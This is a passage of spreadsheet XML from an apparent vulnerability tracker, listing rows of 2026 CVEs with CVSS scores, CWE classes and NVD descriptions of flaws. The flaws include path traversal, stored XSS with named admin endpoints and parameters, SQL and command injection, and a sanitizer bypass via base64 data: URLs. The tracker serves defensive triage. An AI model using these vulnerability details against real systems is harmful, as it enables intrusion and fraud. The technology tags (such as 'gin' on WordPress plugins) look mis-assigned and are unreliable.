      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>64c5ae8f-7972-4697-86a0-7ada793ac795</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>An Origin Validation Error in the middleware of the connect-xcors npm package allows an attacker to bypass origin verification and perform a cross domain authenticated request.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18825</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52749</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router improperly issues session cookies in responses to unauthenticated HTTP requests. This vulnerability allows a remote attacker to obtain a valid session identifier without providing credentials, resulting in an authentication bypass. With this access, the attacker can perform unauthorized actions on upgrade-related functionalities. These actions can be abused to force the router to issue GET requests to arbitrarily chosen domains.
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52749</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55156</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, the dashboard HTTP server in token-optimizer-mcp exposes /api/session-summary and /api/session-events with no authentication middleware — any network-accessible client can reach them without credentials. Both handlers concatenate the caller-supplied sessionId query parameter directly into a filesystem path via path.join, and Node.js normalizes .. segments at resolution time, allowing an unauthenticated attacker to read any .jsonl file reachable from the server's filesystem. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55156</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86838</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-472</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not validate client-supplied booking quantity values on the server before computing the appointment total, allowing unauthenticated users to reduce the total to zero and book paid services for free while bypassing the payment step.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86838</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89300</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>The WP Verify API WordPress plugin through 1.0.0 does not have any authorisation check in one of its REST routes, allowing unauthenticated users to insert arbitrary data into its own database table, as well as to make the site send templated verification emails to arbitrary email addresses. The route is not rate limited either.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89300</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89411</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>The Paymattic WordPress plugin from 4.6.20 before 4.6.26 does not verify that a confirmed Stripe payment belongs to the order it is applied to, allowing unauthenticated users to mark an arbitrary pending order as paid by confirming a smaller payment of their own against it.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89411</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92996</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>The Verge3D WordPress plugin from 4.1.0 through 4.13.0 does not verify with the payment provider that a payment was actually made, and does not check order ownership, allowing unauthenticated users to mark any order as paid.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92996</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80358</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80358</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7170</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7170: parameter 'vendor_store_name' in the endpoint  '/administrator/index.php?pshop_mode=admin&amp;page=store.store_add&amp;option=com_virtuemart&amp;vendor_id=[ID]'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7170</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7171</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7171: parameter 'Apellido 1' in the endpoint  '/administrator/index.php?page=admin.user_add&amp;user_id=45&amp;option=com_virtuemart'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7171</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7172</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7172: parameter 'Nombre Completo' in the endpoint  '/administrator/index.php?option=com_virtuemart&amp;page=admin.user_list'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7172</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100370</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>DOMSanitizer is a DOM/SVG/MathML Sanitizer for PHP 7.3+. Prior to version 1.0.15, the isDangerousUrl() method is responsible for rejecting dangerous URL values in the href and xlink:href attributes. The weakness is that "javascript:" is rejected as a scheme, while "data:" is rejected only when the literal substring onload appears in the URL value (/^data:.*onload/i). Because data: payloads are routinely Base64-encoded, the dangerous content (&lt;script&gt;, event handlers, etc.) is invisible to that substring test. A URL such as data:text/html;base64,… therefore survives in href / xlink:href, even though the decoded payload is active markup. This is an incomplete input-validation / sanitization defect in the sanitizer itself. This issue has been patched in version 1.0.15.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100370</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101018</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dayrui XunruiCMS up to 4.7.2. This issue affects the function group_all_edit of the file dayrui/App/Member/Controllers/Admin/Home.php of the component Group Editing. This manipulation of the argument groupid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101018</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101858</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in RaspAP raspap-webgui up to 3.5.5. Affected is the function WiFiManager::writeWpaSupplicant of the file src/RaspAP/Networking/Hotspot/WiFiManager.php of the component SSID Processing. This manipulation of the argument ssid causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101858</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102263</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
